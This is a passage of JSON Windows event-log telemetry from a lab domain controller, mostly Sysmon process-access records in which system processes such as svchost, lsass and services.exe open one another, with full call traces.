C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:21.326","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2996,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:21.326\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:21.326","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76847,"ProcessID":852,"ThreadID":1116,"Channel":"System","Message":"The DPS service entered the running state.","param1":"DPS","param2":"running","EventReceivedTime":"2020-08-01 06:51:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2997,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:21.373\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:21.373","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2998,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:21.451\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 988\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nTargetProcessId: 852\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:21.451","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"988","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","TargetProcessId":"852","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2999,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:21.451\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:21.451","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3000,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:21.451\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:21.451","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3001,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:21.451\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nSourceProcessId: 852\r\nSourceThreadId: 940\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {E2A3D6B1-10E9-5F25-0000-001068150500}\r\nTargetProcessId: 1280\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+316d|C:\\Windows\\SYSTEM32\\ntdll.dll+7f70d|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+29c02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:21.451","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","SourceProcessId":"852","SourceThreadId":"940","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{E2A3D6B1-10E9-5F25-0000-001068150500}","TargetProcessId":"1280","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+316d|C:\\Windows\\SYSTEM32\\ntdll.dll+7f70d|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+29c02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3002,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:21.451\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-10E9-5F25-0000-001068150500}\r\nTargetProcessId: 1280\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:21.451","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-10E9-5F25-0000-001068150500}","TargetProcessId":"1280","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3003,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:21.451\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-10E9-5F25-0000-001068150500}\r\nTargetProcessId: 1280\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 